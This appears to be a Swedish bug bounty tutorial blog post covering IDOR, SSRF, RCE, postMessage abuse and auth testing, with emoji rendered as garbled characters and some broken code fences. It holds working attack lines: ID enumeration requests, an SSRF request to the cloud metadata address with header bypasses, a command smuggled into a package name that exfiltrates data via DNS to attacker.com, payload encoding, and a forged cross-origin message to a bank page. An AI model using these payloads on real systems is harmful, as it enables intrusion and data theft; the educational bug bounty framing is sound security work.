đ Introduktion: Jakten pĂ„ det digitala guldet #
TÀnk dig att du Àr en modern skattjÀgare. IstÀllet för guldmynt och juveler letar du efter IDOR-sÄrbarheter och RCE-payloads. Varje bugg du hittar Àr en liten kista fylld med belöningar och erkÀnnande. I den hÀr guiden tar vi en djupdykning i riktiga bug bounty-berÀttelser och avslöjar teknikerna som gjort dem framgÄngsrika.
“En bugg Ă€r som en dörr som Ă€r olĂ„st â du behöver bara veta vilket handtag du ska vrida pĂ„” - OkĂ€nd hackare
đ Del 1: SĂ„rbarhetsanalys - FrĂ„n teori till exploatering #
1. đȘ IDOR: NĂ€r din nyckel passar alla dörrar #
Vardagsanalogi: TÀnk dig ett hotell dÀr ditt rumsnummer (t.ex. 1005) ocksÄ Àr din nyckel. Vad hÀnder om du testar nyckel 1000?
Teknisk genomgÄng:
GET /api/v3/user/profile/1000 HTTP/1.1
Authorization: Bearer [DIN_TOKEN]
SÄ hÀr gör du:
- Bygg en “nyckelring” av ID:n med Burp Intruder
- Testa ±500 frÄn ditt eget ID
- Leta efter admin-roller eller kÀnslig data
Pro tips:
“AnvĂ€nd Chrome-tillĂ€gget ‘JSON Data Node Viewer’ som en lupp för att snabbt skanna JSON-svar”
2. đ SSRF: Din port till det interna nĂ€tverket #
Vardagsanalogi: Som att lura en vakthund att hÀmta hemliga dokument frÄn chefens kontor.
Tidsbaserad detektering:
curl -X POST 'https://target.com/api/v2/generate-pdf' -d '{"url":"http://169.254.169.254"}'
# VĂ€nta 8+ sekunder â 504 Timeout = đ
Bypass-tekniker:
X-Forwarded-Host: 127.0.0.1
X-Remote-IP: 192.168.1.1
Bonus: Kombinera med PDF-genereringens WebSocket för extra smygighet!
3. đ„ RCE: NĂ€r systemet blir din marionett #
Vardagsanalogi: Som att skicka falska instruktioner till en pizzabagare som blindt lydar.
DNS-baserad dataexfiltrering:
packageName="legit-pkg; nslookup $(whoami|base64).attacker.com;"
Kodningskedja:
# Din payload blir osynlig:
cat command.txt | base64 | xxd -p | sed 's/../%&/g'
Varning: âł Processer rensas efter 8 sekunder â bli inte avbruten!
đ ïž Del 2: VerktygslĂ„dan - Hacka som en pro #
1. đš Post Message: Cross-origin-trolleri #
Live-demo i devtools:
// PĂ„ attacker.com:
const win = window.open('https://bank.com/dashboard');
setTimeout(() => {
win.postMessage('{"user":"admin"}', '*');
}, 3000);
UpptÀck: grep -rnw 'addEventListener("message"' static/js/
2. đ€ Auth-Testning pĂ„ autopilot #
Burp AutoRepeater-magi:
<Replace>Cookie: session=ADMIN_COOKIE</Replace>
Arbetsflöde:
- Sniffa en admin-förfrÄgan
- Aktivera AutoRepeater
- JÀmför 200 OK mellan anvÀndare
3. đ”ïžâïž JS-övervakning: Din sĂ€kerhetskamera för kod #
Python-skript som vakthund:
# monitor_js.py
import requests
from bs4 import BeautifulSoup
```python
def check_js_changes():
response = requests.get(target_url)
js_files = [script['src'] for script in BeautifulSoup(response.text).find_all('script')]
# Varna vid nya endpoints!
*SchemalÀgg med:* `0 * * * * /usr/bin/python3 /opt/monitor_js.py`
---
## đ§© Slutgiltiga insikter: Bygg ditt bug bounty-kit
### đ BĂ€sta teknikerna 2024:
1. **IDOR Hunting**: ±500 ID-shift + hybridfuzzing
2. **SSRF Tricks**: Tidsdetektering + header-bypass
3. **RCE Eskalering**: DNS-dataexfiltrering + multi-encoding
### đ§ Mindset-mantran:
> "Var som en fĂ€ktmĂ€stare â kombinera enkla slag till dödliga kombon"
### đ ïž Verktyg du behöver:
| Verktyg | AnvÀndning |
|------------------|---------------------|
| Burp AutoRepeater| Session-bypass |
| Kiterunner | Auth-testning |
| monitor_js.py | Live-övervakning |
---
## đ Avslutning: Dags att jaga!
BuggjĂ€gare skapas inte â de formas genom nyfikenhet och systematik. Testa dessa tekniker pĂ„ nĂ€sta bug bounty-event, och kom ihĂ„g:
*"Varje misslyckat försök Àr bara ett steg nÀrmare en crit-severity-utbetalning"*
**Utmaning till dig**:
1. VÀlj en metod frÄn denna guide
2. Applicera pÄ ett CTF eller testmÄl
3. Tweeta resultatet med #BugBountyJourney
*Glöm inte â den största sĂ„rbarheten Ă€r att inte försöka!* đ»đ
---
đą **Vill du lĂ€ra dig mer?** Boka in min workshop "Offensiv automatisering för Bug Bounty" â lĂ€nk i bio!
*[Ditt namn] Àr en bug bounty-jÀgare med 5+ Ärs erfarenhet och en passion för att göra internet sÀkrare. Delar kunskap pÄ [Din blogg/Twitter].*
```mermaid
graph TD
A[Start] --> B{IDOR?}
B -->|Ja| C[Testa ID-shifting]
B -->|Nej| D{SSRF?}
D -->|Ja| E[Fuzza interna IP:n]
D -->|Nej| F[RCE-test]
F --> G[Kombinera buggar!]